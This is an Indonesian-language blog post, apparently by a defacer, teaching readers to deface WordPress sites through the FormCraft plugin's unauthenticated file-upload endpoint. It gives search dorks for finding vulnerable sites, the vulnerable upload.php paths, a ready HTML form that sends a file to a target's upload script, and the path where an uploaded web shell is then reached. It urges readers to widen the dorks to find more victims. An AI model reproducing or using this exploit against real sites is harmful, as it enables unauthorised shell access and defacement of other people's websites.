Thursday 28 May 2015

Tutorial Deface Wordpress Plugins FromCraft Upload

xixihi, Nuenomaru lagi
Maaf kalo sobat bosen, yang menting Nue Ganteng wkwkw
Oke deh langsung aja:

Dork : 
- inurl:"wp-content//plugins/formcraft/"
inurl:"wp-content//plugins/formcraft/" site:.de
(sisanya kembangin lagi ya Om dorknya, biar dapet banyak web Vuln and Verawan :v wkwkw )

Exploit : 

1. wp-content/plugins/formcraft/file-upload/server/php/upload.php
2. wp-content/plugins/formcraft/file-upload/server/php/



Script CSRF :
<form method="POST" action="http://www.target.co.li/wp-content/plugins/formcraft/file-upload/server/php/upload.php"
enctype="multipart/form-data">
<input type="file" name="files[]" /><button>Upload</button>
</form>
*Save AS: .html
*ganti target.co.li ~> menjadi url link target sobat 

Cari target menggunakan dork di atas
Lalu masukkan exploit yang di atas
Jika Vuln akan nampak seperti ini




Sekarang buka filenya dengan browser yang mastah gunakan
Lalu upload deh shell kesayangan Mastah





Jika file upload nya Sukses maka nampak kaya gitu




Shell Access : 
target.co.li/wp-content/plugins/formcraft/file-upload/server/php/files/namashell.php

Jika Berhasil Akan Muncul Shell Kesayangan Sobat

ya kalo kagak berhasil, mungkin faktor face , anda kurang GantenG

Sekian tutorial ini, Semoga bermanfaat
maaf bila ada kesalahan
Happy CMS Wordpress Deface Om


Source and Thanks to: FORUM INCEF



./Nuenomaru


Nuenomaru just an illusion in Cyber World






Visit and follow :

FP         : TKJ Cyber Art
G+         TKJ Cyber Art
youtube : TKJ Cyber Art
BBM      : C0018D1A2


EmoticonEmoticon